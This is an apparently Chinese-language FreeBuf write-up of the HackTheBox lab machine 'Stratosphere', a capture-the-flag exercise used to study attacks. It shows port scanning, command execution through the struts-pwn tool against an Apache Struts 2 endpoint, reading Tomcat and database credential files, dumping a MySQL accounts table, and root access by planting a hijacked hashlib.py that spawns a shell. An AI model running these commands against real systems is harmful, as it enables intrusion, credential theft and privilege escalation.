官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
[Meachines] [Medium] Stratosphere Struts-2-RCE+mysql转存储+python三方库劫持
maptnh- 关注
[Meachines] [Medium] Stratosphere Struts-2-RCE+mysql转存储+python三方库劫持
本文由
maptnh 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.64 | TCP:22,80,8080 |
$ ip='10.10.10.64'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u3 (protocol 2.0)
| ssh-hostkey:
| 2048 5b1637d43c180415c402010ddb07ac2d (RSA)
| 256 e3777b2c23b08ddf38356c40abf68150 (ECDSA)
|_ 256 d76b669c19fcaa666c187accb5870e40 (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"1708-1519762495651"
| Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
| Content-Type: text/html
| Content-Length: 1708
| Date: Wed, 19 Mar 2025 12:49:56 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8"/>
| <title>Stratosphere</title>
| <link rel="stylesheet" type="text/css" href="main.css">
| </head>
| <body>
| <div id="background"></div>
| <header id="main-header" class="hidden">
| <div class="container">
| <div class="content-wrap">
| <p><i class="fa fa-diamond"></i></p>
| <nav>
| class="btn" href="GettingStarted.html">Get started</a>
| </nav>
| </div>
| </div>
| </header>
| <section id="greeting">
| <div class="container">
| <div class="content-wrap">
| <h1>Stratosphere<br>We protect your credit.</h1>
| class="btn" href="GettingStarted.html">Get started now</a>
| <p><i class="ar
| HTTPOptions:
| HTTP/1.1 200
| Allow: OPTIONS, GET, HEAD, POST
| Content-Length: 0
| Date: Wed, 19 Mar 2025 12:49:56 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1874
| Date: Wed, 19 Mar 2025 12:49:57 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or decept
|_http-title: Stratosphere
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"1708-1519762495651"
| Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
| Content-Type: text/html
| Content-Length: 1708
| Date: Wed, 19 Mar 2025 12:49:56 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8"/>
| <title>Stratosphere</title>
| <link rel="stylesheet" type="text/css" href="main.css">
| </head>
| <body>
| <div id="background"></div>
| <header id="main-header" class="hidden">
| <div class="container">
| <div class="content-wrap">
| <p><i class="fa fa-diamond"></i></p>
| <nav>
| class="btn" href="GettingStarted.html">Get started</a>
| </nav>
| </div>
| </div>
| </header>
| <section id="greeting">
| <div class="container">
| <div class="content-wrap">
| <h1>Stratosphere<br>We protect your credit.</h1>
| class="btn" href="GettingStarted.html">Get started now</a>
| <p><i class="ar
| HTTPOptions:
| HTTP/1.1 200
| Allow: OPTIONS, GET, HEAD, POST
| Content-Length: 0
| Date: Wed, 19 Mar 2025 12:49:57 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1874
| Date: Wed, 19 Mar 2025 12:49:57 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or decept
|_http-title: Stratosphere
|_http-open-proxy: Proxy might be redirecting requests
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.93%I=7%D=3/20%Time=67DB4050%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,786,"HTTP/1\.1\x20200\x20\r\nAccept-Ranges:\x20bytes\r\nETag:\x2
SF:0W/\"1708-1519762495651\"\r\nLast-Modified:\x20Tue,\x2027\x20Feb\x20201
SF:8\x2020:14:55\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:\x
SF:201708\r\nDate:\x20Wed,\x2019\x20Mar\x202025\x2012:49:56\x20GMT\r\nConn
SF:ection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x2
SF:0\x20<meta\x20charset=\"utf-8\"/>\n\x20\x20\x20\x20<title>Stratosphere<
SF:/title>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"text/css
SF:\"\x20href=\"main\.css\">\n</head>\n\n<body>\n<div\x20id=\"background\"
SF:></div>\n<header\x20id=\"main-header\"\x20class=\"hidden\">\n\x20\x20<d
SF:iv\x20class=\"container\">\n\x20\x20\x20\x20<div\x20class=\"content-wra
SF:p\">\n\x20\x20\x20\x20\x20\x20<p><i\x20class=\"fa\x20fa-diamond\"></i><
SF:/p>\n\x20\x20\x20\x20\x20\x20<nav>\n\x20\x20\x20\x20\x20\x20\x20\x20<a\
SF:x20class=\"btn\"\x20href=\"GettingStarted\.html\">Get\x20started</a>\n\
SF:x20\x20\x20\x20\x20\x20</nav>\n\x20\x20\x20\x20</div>\n\x20\x20</div>\n
SF:</header>\n\n<section\x20id=\"greeting\">\n\x20\x20<div\x20class=\"cont
SF:ainer\">\n\x20\x20\x20\x20<div\x20class=\"content-wrap\">\n\x20\x20\x20
SF:\x20\x20\x20<h1>Stratosphere<br>We\x20protect\x20your\x20credit\.</h1>\
SF:n\x20\x20\x20\x20\x20\x20<a\x20class=\"btn\"\x20href=\"GettingStarted\.
SF:html\">Get\x20started\x20now</a>\n\x20\x20\x20\x20\x20\x20<p><i\x20clas
SF:s=\"ar")%r(HTTPOptions,7D,"HTTP/1\.1\x20200\x20\r\nAllow:\x20OPTIONS,\x
SF:20GET,\x20HEAD,\x20POST\r\nContent-Length:\x200\r\nDate:\x20Wed,\x2019\
SF:x20Mar\x202025\x2012:49:56\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(R
SF:TSPRequest,7EE,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;char
SF:set=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x201874\r\nDate
SF::\x20Wed,\x2019\x20Mar\x202025\x2012:49:57\x20GMT\r\nConnection:\x20clo
SF:se\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20S
SF:tatus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"
SF:text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,
SF:\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-
SF:size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\
SF:x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;ba
SF:ckground-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20St
SF:atus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1><hr\x20class=\"line\"
SF:\x20/><p><b>Type</b>\x20Exception\x20Report</p><p><b>Message</b>\x20Inv
SF:alid\x20character\x20found\x20in\x20the\x20HTTP\x20protocol</p><p><b>De
SF:scription</b>\x20The\x20server\x20cannot\x20or\x20will\x20not\x20proces
SF:s\x20the\x20request\x20due\x20to\x20something\x20that\x20is\x20perceive
SF:d\x20to\x20be\x20a\x20client\x20error\x20\(e\.g\.,\x20malformed\x20requ
SF:est\x20syntax,\x20invalid\x20request\x20message\x20framing,\x20or\x20de
SF:cept");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.93%I=7%D=3/20%Time=67DB4050%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,786,"HTTP/1\.1\x20200\x20\r\nAccept-Ranges:\x20bytes\r\nETag:\
SF:x20W/\"1708-1519762495651\"\r\nLast-Modified:\x20Tue,\x2027\x20Feb\x202
SF:018\x2020:14:55\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:
SF:\x201708\r\nDate:\x20Wed,\x2019\x20Mar\x202025\x2012:49:56\x20GMT\r\nCo
SF:nnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\
SF:x20\x20<meta\x20charset=\"utf-8\"/>\n\x20\x20\x20\x20<title>Stratospher
SF:e</title>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"text/c
SF:ss\"\x20href=\"main\.css\">\n</head>\n\n<body>\n<div\x20id=\"background
SF:\"></div>\n<header\x20id=\"main-header\"\x20class=\"hidden\">\n\x20\x20
SF:<div\x20class=\"container\">\n\x20\x20\x20\x20<div\x20class=\"content-w
SF:rap\">\n\x20\x20\x20\x20\x20\x20<p><i\x20class=\"fa\x20fa-diamond\"></i
SF:></p>\n\x20\x20\x20\x20\x20\x20<nav>\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:a\x20class=\"btn\"\x20href=\"GettingStarted\.html\">Get\x20started</a>\
SF:n\x20\x20\x20\x20\x20\x20</nav>\n\x20\x20\x20\x20</div>\n\x20\x20</div>
SF:\n</header>\n\n<section\x20id=\"greeting\">\n\x20\x20<div\x20class=\"co
SF:ntainer\">\n\x20\x20\x20\x20<div\x20class=\"content-wrap\">\n\x20\x20\x
SF:20\x20\x20\x20<h1>Stratosphere<br>We\x20protect\x20your\x20credit\.</h1
SF:>\n\x20\x20\x20\x20\x20\x20<a\x20class=\"btn\"\x20href=\"GettingStarted
SF:\.html\">Get\x20started\x20now</a>\n\x20\x20\x20\x20\x20\x20<p><i\x20cl
SF:ass=\"ar")%r(HTTPOptions,7D,"HTTP/1\.1\x20200\x20\r\nAllow:\x20OPTIONS,
SF:\x20GET,\x20HEAD,\x20POST\r\nContent-Length:\x200\r\nDate:\x20Wed,\x201
SF:9\x20Mar\x202025\x2012:49:57\x20GMT\r\nConnection:\x20close\r\n\r\n")%r
SF:(RTSPRequest,7EE,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;ch
SF:arset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x201874\r\nDa
SF:te:\x20Wed,\x2019\x20Mar\x202025\x2012:49:57\x20GMT\r\nConnection:\x20c
SF:lose\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x2
SF:0Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=
SF:\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h
SF:2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{fon
SF:t-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20
SF:p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;
SF:background-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20
SF:Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1><hr\x20class=\"line
SF:\"\x20/><p><b>Type</b>\x20Exception\x20Report</p><p><b>Message</b>\x20I
SF:nvalid\x20character\x20found\x20in\x20the\x20HTTP\x20protocol</p><p><b>
SF:Description</b>\x20The\x20server\x20cannot\x20or\x20will\x20not\x20proc
SF:ess\x20the\x20request\x20due\x20to\x20something\x20that\x20is\x20percei
SF:ved\x20to\x20be\x20a\x20client\x20error\x20\(e\.g\.,\x20malformed\x20re
SF:quest\x20syntax,\x20invalid\x20request\x20message\x20framing,\x20or\x20
SF:decept");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Struts 2 RCE && Tomcat 8
$ feroxbuster -u 'http://10.10.10.64/'
http://10.10.10.64/Monitoring/example/Welcome.action
$ whatweb http://10.10.10.64/Monitoring/example/Welcome.action -v
目标应用使用了 Java,并且 URL 包含 .action,这通常可能是 Apache Struts 2(简称 S2)框架的一个特征。
https://github.com/mazen160/struts-pwn
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'id'
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'cat /etc/tomcat8/tomcat-users.xml'
username:teampwner>password:cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'cat db_connect'
[ssn]
user=ssn_admin
pass=AWs64@on*&
[users]
user=admin
pass=admin
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'mysql -uadmin -padmin -e "SHOW DATABASES;"'
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'mysql -uadmin -padmin -e "SHOW DATABASES;use users;show tables;"'
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'mysql -uadmin -padmin -e "SHOW DATABASES;use users;show tables;select * from accounts;"'
>username:richard
>password:9tc*rhKuG5TyXvUJOrE^5CK7k
$ ssh richard@10.10.10.64
User.txt
931bcbf5736460e560bce0c4a2312acc
Privilege Escalation:python module hijack
richard@stratosphere:~$ cat /home/richard/test.py
$ find / -name "hashlib.py" 2>/dev/null -exec ls -la {} \; -exec lsattr {} \;
$ echo 'import os;os.system("/bin/bash")'>hashlib.py
$ sudo python3 /home/richard/test.py
个人觉得应该先需要将环境变量设置到该目录,再进行劫持
Root.txt
8d7e34dc0d82718cf7f15fa8b6113a1f
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
maptnh
Ценность жизни выше, чем кража данных.
已在FreeBuf发表 329 篇文章
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox
相关推荐
![[Meachines] [Medium] Sneaky snmp+SSH-IPV6+BOF-NOP-Sled权限提升](https://image.3001.net/images/20250319/1742388016_67dabb30cf633526cf96e.png)
maptnh LV.9
Ценность жизни выше, чем кража данных.
- 329 文章数
- 62 关注者
[Meachines] [Medium] RedCross XSS+Firewall-RCE+BOF-ROP-PLT权限提升
2025-03-23
[Meachines] [Hard] Spooktrol uvicorn-LFI+C2-RE+D-Link-V2文件同步+ C2任务表注入权限提升
2025-03-22
D-link-V2(暗链) : 实时文件同步密钥安全验证持久化Linux
2025-03-22
文章目录